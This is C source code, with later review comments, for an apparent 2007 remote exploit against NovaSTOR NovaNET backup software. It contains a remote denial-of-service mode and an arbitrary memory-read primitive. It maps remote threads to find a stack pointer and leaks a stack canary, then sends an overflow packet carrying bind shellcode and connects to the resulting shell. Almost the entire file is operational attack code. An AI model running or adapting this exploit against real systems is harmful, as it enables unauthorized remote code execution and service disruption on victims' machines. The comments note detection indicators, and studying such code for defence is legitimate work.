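/*
 * Entry point of the DoS / memory-read listing.
 *
 * Usage: <host> [start end], where start and end are hex addresses
 * written as 0x...; argv[2]/argv[3] are parsed with sscanf("0x%p").
 * An odd argc (no host, or a start without an end) prints the usage
 * text and exits with EXIT_SUCCESS, as the original did.
 *
 * With only <host> given, novanet_read() is called with its last
 * argument (the DoS flag) set to 1 and start/end left as NULL; the
 * original passed indeterminate pointers in that mode, which is
 * undefined behaviour even if novanet_read() ignores them.
 *
 * novanet_read() is defined elsewhere in this file. The other functions
 * in this file call a 3-argument novanet_read(); this main() appears to
 * belong to a separate tool that shares the name.
 */
int main (int argc, char **argv)
{
  void *start = NULL;   /* NULL rather than indeterminate when no range is parsed */
  void *end = NULL;

  printf ("NovaSTOR NovaNET remote DoS + arbitrary memory read\n"
          "by: <*****@*****.**>\n"
          "http://www.digit-labs.org/ -- Digit-Labs 2007!@$!\n\n");

  /*
   * argc must be 2 (host only) or 4 (host start end), and both
   * addresses must parse. argc < 2 is rejected explicitly so argv[1]
   * is never read when it does not exist.
   */
  if (argc < 2
      || (argc % 2) == 1
      || (argc > 3 && (sscanf (argv[2], "0x%p", &start) != 1
                       || sscanf (argv[3], "0x%p", &end) != 1))) {
    fprintf (stderr, "Usage: %s <host> [[start] [end]]\n"
             "Note: not specifying [[start] [end]] results in DoS!\n\n",
             argc > 0 ? argv[0] : "novanet");
    exit (EXIT_SUCCESS);
  }

  if (argc > 3) {
    /* Cast to char * before subtracting: void * arithmetic is a GNU extension. */
    printf ("dumping from: %p -> %p (%d-bytes) to stderr\n",
            start, end, (int) ((char *) end - (char *) start));
  }

  /* Last argument is the DoS flag: set only when no address range was given. */
  novanet_read (argv[1], start, end, !(argc > 3));

  return (EXIT_SUCCESS);
}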
/*
 * Copies a string out of the remote process into dst, 4 bytes per
 * round trip, using the novanet_read() primitive defined elsewhere in
 * this file (a return of 0 is treated as a failed read).
 *
 * host:    target host, passed through to novanet_read().
 * start:   remote address the string is read from.
 * dst:     local buffer receiving the bytes.
 * dst_len: size of dst; the loop stops once nbytes >= dst_len - 5.
 *
 * Review notes:
 *  - If the loop ends on the length bound rather than on a NUL inside
 *    the last 4-byte word, dst is left unterminated; the caller's
 *    r_buf is an uninitialised stack array, so a later strcmp()/printf()
 *    on it may read past the copied bytes.
 *  - &r_val has type char (*)[NOVANET_READ_SZ]; novanet_read()'s third
 *    parameter type is not visible here -- presumably void *.
 *  - HAS_NULL is a macro defined elsewhere; from its use on
 *    *(int *) r_val it presumably tests whether any byte of the word is
 *    zero.
 *  - r_addr += 4 is arithmetic on void *, a GNU extension.
 */
static void novanet_read_str (char *host, void *start, char *dst, int dst_len)
{
  char r_val[NOVANET_READ_SZ], *ptr;
  void *r_addr;
  int nbytes;

  nbytes = 0;
  ptr = dst;
  r_addr = start;

  do {
    /* One remote read per 4-byte word; stop on the first failure. */
    if (novanet_read (host, r_addr, &r_val) == 0)
      break;
    /* Copy the word as-is; strncpy here is a plain 4-byte copy, not a bounded string copy. */
    strncpy (ptr, r_val, 4);
    /* A NUL somewhere in this word terminates the string. */
    if (HAS_NULL (*(int *) r_val))
      break;
    ptr += 4;
    r_addr += 4;
    nbytes += 4;
  } while (nbytes < dst_len - 5);
}
/*
 * Drives the overwrite stage against thost: leaks one 4-byte value from
 * a fixed address (labelled as the stack canary in nnwindtb.dll by the
 * diagnostic below), then replays a fixed login/remaining/"hammer"
 * packet sequence over NOVANET_TCP_PORT and finally tries to connect
 * to PORT_SHELL.
 *
 * thost:   target host.
 * d_name:  domain name copied into login_buf at offset 0x54; exactly
 *          NOVANET_DOMAIN_SZ bytes are copied, so the caller must
 *          guarantee d_name is at least that long.
 * esp_val: stack pointer value from novanet_map_process(), consumed by
 *          the CANARY_VAL macro (defined elsewhere).
 *
 * Every failure path calls exit(EXIT_FAILURE); the function never
 * returns an error. login_buf, rem_buf, win32_x86_bind, sockami(),
 * sock_send(), sock_recv(), shellami() and the size/port/time constants
 * are defined elsewhere in this file.
 *
 * Review notes:
 *  - malloc() is unchecked; memset() would dereference NULL on failure.
 *  - The hammer packet is rlen bytes of 0x41 filler with two words
 *    patched at 0x104/0x108 and the payload at 0x10C+64; on the wire
 *    that filler pattern, preceded by the fixed login packet, is the
 *    observable a network detection would key on, and a new listener on
 *    PORT_SHELL is the post-exploitation indicator on the host.
 *  - The sends compare the byte count against NOVANET_PKT_SZ /
 *    NOVANET_HDR_SZ while passing sizeof buf - 1, so login_buf and
 *    rem_buf are presumably string literals of exactly that length.
 *  - Pointers are cast to int and unsigned int is written through
 *    char * at fixed offsets: this is 32-bit, x86-only code.
 */
static void novanet_own_process (char *thost, char *d_name, int esp_val)
{
  char rbuf_pkt[NOVANET_PKT_SZ], *ptr;
  int canary_val, fd, n, rlen;

  /* Step 1: read the 4-byte value at the fixed nnwindtb.dll address. */
  if (novanet_read (thost, (void *) 0x016A6784, &canary_val) == 0) {
    fprintf (stderr, "novanet_own_process: reading canary failed\n");
    exit (EXIT_FAILURE);
  }

  fd = sockami (thost, NOVANET_TCP_PORT);
  if (fd == -1) {
    fprintf (stderr, "novanet_own_process: sockami failed\n");
    exit (EXIT_FAILURE);
  }

  printf ("** [nnwindtb.dll @ 0x016A6784] stack canary: 0x%08X\n\n", (int) canary_val);

  /* The derived value must contain no zero byte, or the copy below would stop early. */
  if (HAS_NULL (CANARY_VAL(canary_val, esp_val))) {
    fprintf (stderr, "novanet_own_process: canary value invalid :(\n");
    exit (EXIT_FAILURE);
  }

  printf ("* connected to %s:%d\n", thost, NOVANET_TCP_PORT);

  /* Unbounded with respect to d_name: always NOVANET_DOMAIN_SZ bytes. */
  memcpy (&login_buf[0x54], d_name, NOVANET_DOMAIN_SZ);

  /* Step 2: login packet; the reply is read but not inspected. */
  printf ("** sending login packet...");
  if ((n = sock_send (fd, login_buf, sizeof login_buf - 1)) != NOVANET_PKT_SZ) {
    fprintf (stderr, "novanet_own_process: sock_send returned %d (!= %d)\n", n, NOVANET_PKT_SZ);
    exit (EXIT_FAILURE);
  }
  printf ("done\n");

  printf ("** reading fourth packet...");
  if ((n = sock_recv (fd, rbuf_pkt, sizeof rbuf_pkt)) != NOVANET_PKT_SZ) {
    fprintf (stderr, "novanet_own_process: sock_recv returned %d (!= %d)\n", n, NOVANET_PKT_SZ);
    exit (EXIT_FAILURE);
  }
  printf ("done\n");

  /* Step 3: header packet announcing the length of the packet that follows. */
  rlen = 0x10C + 64 + (sizeof win32_x86_bind - 1) + 1;
  *(unsigned int *) &rem_buf[12] = rlen + NOVANET_HDR_SZ;   /* length field at offset 12 */

  printf ("** sending remaining %d-bytes packet...", rlen);
  if ((n = sock_send (fd, rem_buf, sizeof rem_buf - 1)) != NOVANET_HDR_SZ) {
    fprintf (stderr, "novanet_own_process: sock_send returned %d (!= %d)\n", n, NOVANET_HDR_SZ);
    exit (EXIT_FAILURE);
  }
  printf ("done\n");

  /* Step 4: the rlen-byte packet; malloc() result is not checked. */
  printf ("** sending hammer packet...");
  ptr = malloc (rlen * sizeof (char));
  memset (ptr, 0x41, rlen);
  *(unsigned int *) &ptr[0x104] = CANARY_VAL(canary_val, esp_val);
  *(unsigned int *) &ptr[0x108] = NTDLL_ESP;
  memcpy (&ptr[0x10C + 64], win32_x86_bind, sizeof win32_x86_bind - 1);
  ptr[rlen - 1] = '\0';

  if ((n = sock_send (fd, ptr, rlen)) != rlen) {
    fprintf (stderr, "novanet_own_process: sock_send returned %d (!= %d)\n", n, rlen);
    exit (EXIT_FAILURE);
  }
  free (ptr);
  printf ("done\n\n");

  usleep (USLEEP_TIME);
  close (fd);

  /* Step 5: fixed delay, then a single connection attempt to PORT_SHELL. */
  printf ("* waiting for the shellcode to be executed...\n");
  sleep (2);

  if ((fd = sockami (thost, PORT_SHELL)) != -1) {
    printf ("+Wh00t!\n\n");
    shellami (fd);
  }
}
/*
 * Uses the novanet_read() primitive to locate one thread of the remote
 * process and derive a stack pointer value for it.
 *
 * Phase 1 reads a count and a list head from two fixed offsets of
 * 0x10133C60 (labelled nnwinsup.dll by the diagnostics), walks the
 * singly linked list (next pointer at offset 0, name string at +0xE8)
 * and remembers the node whose name equals NOVANET_THREAD_NAME.
 * Phase 2 walks the TEB ranges in the teb_addrs table, reading the
 * words at +0x04, +0x08 and +0x24 of each block (labelled stack top,
 * stack base and thread id by the diagnostic) and the word at
 * stack top - 0x7C, which it compares with the node address found in
 * phase 1.
 *
 * host:    target host.
 * esp_val: out parameter; set to stack top - 0x444 on success.
 *
 * Returns 0 when a matching TEB is found, -1 when a list read fails,
 * the named thread is absent, or no TEB matches.
 *
 * Review notes:
 *  - num_threads counts nodes with a non-NULL next pointer, so the last
 *    node is never counted; this may be intended to mirror thr_count.
 *  - A failed read inside the inner loop only breaks out of that TEB
 *    range; scanning continues with the next entry of teb_addrs.
 *  - r_buf is not initialised and novanet_read_str() may leave it
 *    unterminated, so strcmp()/printf() can read indeterminate bytes.
 *  - st_addr is an int compared with 0xFFFFFFFF (unsigned) and then
 *    cast to void *; together with the (int) pointer casts this is
 *    32-bit-only code. Arithmetic on void * is a GNU extension.
 *  - The fixed module base and offsets are build-specific; on another
 *    build the reads simply return unrelated memory.
 */
static int novanet_map_process (char *host, int *esp_val)
{
  void *r_addr, *teb_addr, *thr_list, *arg_addr;
  int i, j, num_threads, thr_count;
  char r_buf[NOVANET_BUF_SZ];

  /* Phase 1: thread list bookkeeping at fixed offsets from 0x10133C60. */
  r_addr = (void *) 0x10133C60 + 0x12510;
  if (novanet_read (host, r_addr, &thr_count) == 0)
    return (-1);

  printf ("** [nnwinsup.dll @ 0x10133C60+0x12510] thread list used: 0x%08X\n", thr_count);

  num_threads = 0;
  r_addr = (void *) 0x10133C60 + 0xB938;
  if (novanet_read (host, r_addr, &thr_list) == 0)
    return (-1);

  printf ("*** [nnwinsup.dll @ 0x10133C60+0x0B938] head ptr: 0x%08X\n", (int) thr_list);

  arg_addr = NULL;

  /* Walk the list until a NULL next pointer; any failed read aborts. */
  while ((r_addr = thr_list)) {
    if (novanet_read (host, r_addr, &thr_list) == 0)
      return (-1);

    novanet_read_str (host, r_addr + 0xE8, r_buf, sizeof r_buf);

    printf ("*** [nnwinsup.dll @ 0x%08X] next ptr: 0x%08X, name: \"%s\"\n", (int) r_addr, (int) thr_list, r_buf);

    if (strcmp (r_buf, NOVANET_THREAD_NAME) == 0)
      arg_addr = r_addr;   /* last match wins if the name repeats */

    if (thr_list != NULL)
      num_threads++;       /* counts links, not nodes */
  }

  printf ("** [nnwinsup.dll @ 0x10133C60+0x0B938] thread count: %d\n", num_threads);

  if (arg_addr == NULL)
    return (-1);

  /* Phase 2: scan each TEB range downwards, one WIN32_TEB_SZ block at a time. */
  for (i = 0; i < NOVANET_TEB_BLKS; i++) {
    teb_addr = teb_addrs[i].teb_start - WIN32_TEB_SZ;

    printf ("** [TEB BLK @ 0x%08X] scanning %d blocks\n", (int) teb_addr, teb_addrs[i].teb_num);

    for (j = 0; j < teb_addrs[i].teb_num; j++, teb_addr -= WIN32_TEB_SZ) {
      int st_addr, sb_addr, thr_id;
      void *thr_arg;

      /* Read failures here leave only this range, not the outer loop. */
      r_addr = teb_addr + 0x04;
      if (novanet_read (host, r_addr, &st_addr) == 0)
        break;

      r_addr = teb_addr + 0x08;
      if (novanet_read (host, r_addr, &sb_addr) == 0)
        break;

      r_addr = teb_addr + 0x24;
      if (novanet_read (host, r_addr, &thr_id) == 0)
        break;

      /* 0xFFFFFFFF marks an unusable stack top; use a sentinel instead of reading. */
      if (st_addr != 0xFFFFFFFF) {
        r_addr = (void *) st_addr - 0x7C;
        if (novanet_read (host, r_addr, &thr_arg) == 0)
          break;
      } else
        thr_arg = (void *) 0xDEADBEEF;

      printf ("** [TEB @ 0x%08X] thread id: %04X, stack base: 0x%08X, top: 0x%08X, arg: 0x%08X\n", (int) teb_addr, thr_id, sb_addr, st_addr, (int) thr_arg);

      /* The word below the stack top is compared with the list node found in phase 1. */
      if (thr_arg == arg_addr) {
        printf ("** [TEB @ 0x%08X] found thread id: %04X, stack top: 0x%08X, ESP: 0x%08X\n", (int) teb_addr, thr_id, st_addr, st_addr - 0x444);
        *esp_val = st_addr - 0x444;
        return (0);
      }
    }
  }

  return (-1);
}